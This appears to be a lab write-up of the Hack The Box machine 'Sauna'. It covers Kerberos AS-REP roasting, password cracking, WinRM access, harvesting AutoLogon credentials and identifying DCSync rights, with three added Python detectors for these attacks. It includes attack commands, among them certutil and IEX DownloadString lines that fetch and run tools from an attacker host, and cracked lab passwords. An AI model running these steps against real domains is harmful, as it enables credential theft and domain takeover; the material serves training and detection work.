As always, we start with an nmap scan:
# Nmap 7.80 scan initiated Tue Feb 18 03:17:50 2020 as: nmap -A -oN allports 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.076s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-18 16:19:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/18%Time=5E4B9DC1%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m51s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-02-18T16:22:19
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   100.30 ms 10.10.16.1
2   100.29 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 18 03:23:06 2020 -- 1 IP address (1 host up) scanned in 317.70 seconds
The most interesting open ports were HTTP (80), Kerberos (88) and WinRM (5985).
User
I enumerated the LDAP port. A lot of information was returned, but the most interesting part was:
root@kali:~/htb/sauna# ldapsearch -h 10.10.10.175 -p 389 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt
root@kali:~/htb/sauna# ls
allports  ldaplogall.txt

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Now we have a possible username: “Hugo Smith”.
If you try to AS-REP roast that user you will find that it doesn’t exist, so I tried variations of the name and found one that was indeed a valid user: hsmith.
Variations I tried:
Hugo Smith
HugoSmith
hugo.smith
h.smith
hsmith
smithh
smith.h
smith.hugo
smithhugo
smith hugo
Found user:
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile hugosmith.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax
So now we have a valid user, “hsmith”, but no password…
It’s time to take a look at the web server. There you will only find a few HTML pages, but some of them contain interesting names:
Now that we know the format used to build the usernames, let’s check these candidates:
fsmith
scoins
sdriver
btaylor
hbear
We found that the user “fsmith” is vulnerable to AS-REP roasting, and we obtained a crackable “hash”:
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.LOCAL/FSmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for FSmith
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:cb52c62c6143cf4cc4c71dccf64756f5$...
So, let’s crack it with john and rockyou:
c:\PENTEST\HASHCAT>hashcat32.exe -m 18200 -a 0 -w 3 EGOTISTICAL-BANK.hash e:\pentest\rockyou.txt --force
hashcat (v5.1.0) starting...

Hashcat did not work for me, so I used john instead:

root@kali:~/htb/sauna# john ego.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:33 DONE (2020-02-18 04:48) 0.02995g/s 315720p/s 315720c/s 315720C/s Thines..Theredwolf_120691
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Credentials found: fsmith:Thestrokes23
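From the blue-team side the username guessing and the roast above both leave traces on the domain controller. The following is an added example, not part of the original write-up and not an Impacket feature: a small Python detector over constructed Windows Security event 4768 records that flags TGTs issued without pre-authentication (result 0x0, Pre-Authentication Type 0, and RC4 etype 0x17 for the $krb5asrep$23$ format) and source addresses that rack up KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) failures. The sample records, the field layout used to build them and the five-failure threshold are assumptions.

```python
"""Spot AS-REP roasting and Kerberos username guessing in event 4768 records.

Added example, not part of the original write-up. Each guessed name that does
not exist is a 4768 failure with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN);
a successful roast of an account with UF_DONT_REQUIRE_PREAUTH is a 4768 with
result 0x0, Pre-Authentication Type 0 and, for the $krb5asrep$23$ hash format,
Ticket Encryption Type 0x17 (RC4). The records below are constructed in the
event's message-text layout; the threshold of five unknown principals per
source address is an assumed tuning value.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

FIELD_RE = re.compile(r"^\s*([^:]+?):\s*(.*?)\s*$")


@dataclass
class TgtRequest:
    account: str
    client: str
    result: Optional[int]
    etype: Optional[int]
    preauth: Optional[int]


def _hexint(value: Optional[str]) -> Optional[int]:
    """Parse '0x17', '0x0' or '2'; '-' and missing fields mean unknown."""
    if value in (None, "", "-"):
        return None
    return int(value, 0)


def parse_4768(message: str) -> TgtRequest:
    """Pull the fields that matter out of a 4768 message body."""
    fields: Dict[str, str] = {}
    for line in message.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2)
    return TgtRequest(
        account=fields.get("Account Name", ""),
        client=fields.get("Client Address", "").replace("::ffff:", ""),
        result=_hexint(fields.get("Result Code")),
        etype=_hexint(fields.get("Ticket Encryption Type")),
        preauth=_hexint(fields.get("Pre-Authentication Type")),
    )


def classify(req: TgtRequest) -> Optional[str]:
    """A TGT issued with no pre-authentication is an AS-REP roast candidate."""
    if req.result == 0 and req.preauth == 0:
        return "asrep-roast-rc4" if req.etype == 0x17 else "asrep-roast"
    return None


def enumeration_sources(reqs: Iterable[TgtRequest], threshold: int = 5) -> List[str]:
    """Client addresses with at least `threshold` 'client not found' failures."""
    counts = Counter(r.client for r in reqs if r.result == 0x6)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def analyse(messages: Iterable[str]) -> Dict[str, object]:
    """Run both checks over a batch of 4768 message bodies."""
    reqs = [parse_4768(m) for m in messages]
    roasted: List[Tuple[str, str, str]] = []
    for r in reqs:
        verdict = classify(r)
        if verdict:
            roasted.append((r.account, r.client, verdict))
    return {"roasted": roasted, "enumeration_sources": enumeration_sources(reqs)}


def make_4768(account: str, client: str, result: str, etype: str, preauth: str) -> str:
    """Build a constructed 4768 message body in the Windows text layout."""
    return (
        "A Kerberos authentication ticket (TGT) was requested.\n"
        "Account Information:\n"
        f"\tAccount Name:\t\t{account}\n"
        "\tSupplied Realm Name:\tEGOTISTICAL-BANK.LOCAL\n"
        "Service Information:\n"
        "\tService Name:\t\tkrbtgt\n"
        "Network Information:\n"
        f"\tClient Address:\t\t::ffff:{client}\n"
        "Additional Information:\n"
        f"\tResult Code:\t\t{result}\n"
        f"\tTicket Encryption Type:\t{etype}\n"
        f"\tPre-Authentication Type:\t{preauth}\n"
    )


# Constructed sample: the username guesses from above failing from one source,
# the FSmith roast succeeding, one normal AES logon and one stray typo elsewhere.
SAMPLE_4768 = [
    make_4768(name, "10.10.14.10", "0x6", "0xffffffff", "-")
    for name in ("HugoSmith", "hugo.smith", "h.smith", "smithh", "smith.h", "smith.hugo")
] + [
    make_4768("FSmith", "10.10.14.10", "0x0", "0x17", "0"),
    make_4768("svc_loanmgr", "10.10.10.175", "0x0", "0x12", "2"),
    make_4768("jdoe", "10.10.16.70", "0x6", "0xffffffff", "-"),
]

if __name__ == "__main__":
    print(analyse(SAMPLE_4768))
```

Running it over the constructed batch reports FSmith as an RC4 AS-REP roast from 10.10.14.10 and that same address as an enumeration source; the svc_loanmgr logon (pre-auth type 2, AES) is ignored. The fix on the directory side is to clear "Do not require Kerberos preauthentication" on the account, which is what makes the 4768 with pre-auth type 0 possible in the first place.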
Now, just connect via WinRM and grab the user flag:
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i EGOTISTICAL-BANK.LOCAL

*Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf
*Evil-WinRM* PS C:\Users\FSmith\desktop> certutil -urlcache -split -f http://10.10.14.10/WINPEAS.exe C:\Users\FSmith\Documents\WINPEAS.exe
Root
I started enumerating the box with winPEAS:
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winpeas.exe systeminfo userinfo
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
--snip--
[+] RDP Sessions(T1087&T1033)
Not Found

[+] Ever logged users(T1087&T1033)
[X] Exception: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()
   at System.Management.ManagementScope.Initialize()
   at System.Management.ManagementObjectSearcher.Initialize()
   at System.Management.ManagementObjectSearcher.Get()
   at winPEAS.UserInfo.GetEverLoggedUsers()
Not Found

[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Or it can be done manually:
*Evil-WinRM* PS C:\Users\FSmith\Documents> REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x8e3982368
    ShutdownFlags    REG_DWORD    0x80000027
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey

*Evil-WinRM* PS C:\Users\FSmith\Documents>
Either way, there are interesting credentials inside the Winlogon registry key:
There isn’t any user called “svc_loanmanager”, but there is one called “svc_loanmgr”:
svc_loanmgr:Moneymakestheworldgoround!
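As an added example (not from the write-up and not winPEAS code), here is the same AutoLogon check written as a parser over REG QUERY output, so it can be run over registry exports collected from many hosts instead of by hand on one box. The sample input is constructed from the values shown above, trimmed to the ones that matter.

```python
"""Flag cleartext AutoLogon credentials in Winlogon 'REG QUERY' output.

Added example, not part of the original write-up. What winPEAS reported is a
handful of values under the Winlogon key, readable by any local user. This
parser takes the text 'REG QUERY' prints for that key (the sample below is
constructed from the values in the write-up) and reports whether a password is
stored in the clear, which account it belongs to, and whether AutoAdminLogon
is even switched on.
"""
import re
from typing import Dict, List

VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*?)\s*$")
WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"


def parse_reg_query(text: str) -> Dict[str, Dict[str, str]]:
    """Map each key path in REG QUERY output to its {value name: data}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(3)
    return keys


def audit_autologon(text: str) -> List[str]:
    """Findings for the Winlogon key; an empty list means nothing to report."""
    values = parse_reg_query(text).get(WINLOGON_KEY, {})
    findings: List[str] = []
    password = values.get("DefaultPassword", "")
    if not password:
        return findings
    user = values.get("DefaultUserName", "") or "<no DefaultUserName>"
    findings.append(f"cleartext DefaultPassword stored for {user}")
    if values.get("AutoAdminLogon", "0") != "1":
        # AutoLogon is off, yet the password was left behind: exactly the case above.
        findings.append("AutoAdminLogon is not 1, so the stored password is stale but still readable")
    if "\\" in user and not user.startswith(".\\"):
        findings.append(f"{user} is a domain account, so the exposure is domain-wide, not host-local")
    return findings


# Constructed from the REG QUERY output in the write-up (trimmed to the values that matter).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    LegalNoticeCaption    REG_SZ
    Shell    REG_SZ    explorer.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
"""

if __name__ == "__main__":
    for finding in audit_autologon(SAMPLE_REG_QUERY):
        print("[!]", finding)
```

On the sample this produces three findings: a cleartext password for EGOTISTICALBANK\svc_loanmanager, AutoAdminLogon not enabled (the password is simply a leftover), and the account being a domain account rather than a local one. One caveat: this only sees the registry value; when AutoLogon is configured with the Sysinternals Autologon tool the password goes into the LSA DefaultPassword secret instead, which this parser will not catch.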
You can connect as that user with the password extracted from the registry.
You can also use SharpHound to enumerate the domain, and you will find that the user svc_loanmgr has the rights needed to perform DCSync against the DC:
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u svc_loanmgr -p "Moneymakestheworldgoround!" -i EGOTISTICAL-BANK.LOCAL

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.70/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 5:42 PM on 2/18/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 ∞/s --- Using 83 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4511238
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc_loanmgr\Documents\20200218174244_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200218174244_BloodHound.zip
Info: Downloading 20200218174244_BloodHound.zip to 20200218174244_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> exit
Info: Exiting with code 0
root@kali:/opt/evil-winrm#
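The DCSync edge SharpHound draws for svc_loanmgr comes from the replication extended rights on the domain object, and using them is visible on the DC. The following is an added example, not part of this write-up and not SharpHound or BloodHound code: a Python detector over constructed Windows Security event 4662 records that flags any non-DC principal whose Properties list names a replication GUID. The sample records, their text layout and the allow-list name MSOL_example are assumptions.

```python
"""Detect DCSync-style replication requests in Security event 4662 records.

Added example, not part of the original write-up. Replication uses extended
rights on the domain object: DS-Replication-Get-Changes
(1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All
(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2). With Directory Service Access auditing
on, each use of them is a 4662 whose Properties list carries the GUID. Domain
controllers (machine accounts ending in '$') exercise these rights all day; a
user account doing so is the signal. The records and the allow-list entry
below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
FIELD_RE = re.compile(r"^\s*([^:]+?):\s*(.*?)\s*$")
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


@dataclass
class DsAccess:
    account: str
    domain: str
    properties: List[str]  # GUIDs listed under Properties, lower-cased


def parse_4662(message: str) -> DsAccess:
    """Extract the subject and the property/right GUIDs from a 4662 message body."""
    fields: Dict[str, str] = {}
    for line in message.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2)
    # Only GUIDs after 'Properties:' count; the Object Type GUID above it is a class, not a right.
    _, _, tail = message.partition("Properties:")
    return DsAccess(
        account=fields.get("Account Name", ""),
        domain=fields.get("Account Domain", ""),
        properties=[g.lower() for g in GUID_RE.findall(tail)],
    )


def replication_rights_used(ev: DsAccess) -> List[str]:
    """Names of the replication rights this event touched, in event order."""
    return [REPLICATION_RIGHTS[g] for g in ev.properties if g in REPLICATION_RIGHTS]


def is_dcsync(ev: DsAccess, allowed: Iterable[str] = ()) -> bool:
    """True when a non-DC, non-allow-listed principal used a replication right."""
    if not replication_rights_used(ev):
        return False
    if ev.account.endswith("$"):  # domain controllers replicate legitimately
        return False
    return ev.account.lower() not in {a.lower() for a in allowed}


def find_dcsync(messages: Iterable[str], allowed: Iterable[str] = ()) -> List[Tuple[str, List[str]]]:
    """(DOMAIN\\account, rights used) for every suspicious 4662 in the batch."""
    allowed = set(allowed)
    hits: List[Tuple[str, List[str]]] = []
    for m in messages:
        ev = parse_4662(m)
        if is_dcsync(ev, allowed):
            hits.append((f"{ev.domain}\\{ev.account}", replication_rights_used(ev)))
    return hits


def make_4662(account: str, domain: str, guids: List[str]) -> str:
    """Build a constructed 4662 message body in the Windows text layout."""
    return (
        "An operation was performed on an object.\n"
        "Subject :\n"
        f"\tAccount Name:\t\t{account}\n"
        f"\tAccount Domain:\t\t{domain}\n"
        "Object:\n"
        "\tObject Server:\t\tDS\n"
        "\tObject Type:\t\t%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\n"
        "\tObject Name:\t\tDC=EGOTISTICAL-BANK,DC=LOCAL\n"
        "Operation:\n"
        "\tAccesses:\t\tControl Access\n"
        "\tAccess Mask:\t\t0x100\n"
        "\tProperties:\t\tControl Access\n"
        + "".join(f"\t\t{{{g}}}\n" for g in guids)
    )


GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Constructed sample: the service account from the write-up pulling replication
# data, the DC doing the same legitimately, an allow-listed sync account
# (MSOL_example is a placeholder name) and a user merely reading an attribute.
SAMPLE_4662 = [
    make_4662("svc_loanmgr", "EGOTISTICALBANK", [GET_CHANGES, GET_CHANGES_ALL]),
    make_4662("SAUNA$", "EGOTISTICALBANK", [GET_CHANGES, GET_CHANGES_ALL]),
    make_4662("MSOL_example", "EGOTISTICALBANK", [GET_CHANGES, GET_CHANGES_ALL]),
    make_4662("FSmith", "EGOTISTICALBANK", ["bf967a68-0de6-11d0-a285-00aa003049e2"]),  # userAccountControl
]

if __name__ == "__main__":
    for who, rights in find_dcsync(SAMPLE_4662, allowed={"MSOL_example"}):
        print(f"[!] DCSync-style read by {who}: {', '.join(rights)}")
```

With the allow-list in place only EGOTISTICALBANK\svc_loanmgr is reported; without it the sync account is flagged too, which is the usual source of noise for this rule. The lasting fix for the box is the ACL itself: remove the replication rights from svc_loanmgr on the domain object, since no ordinary service account needs them.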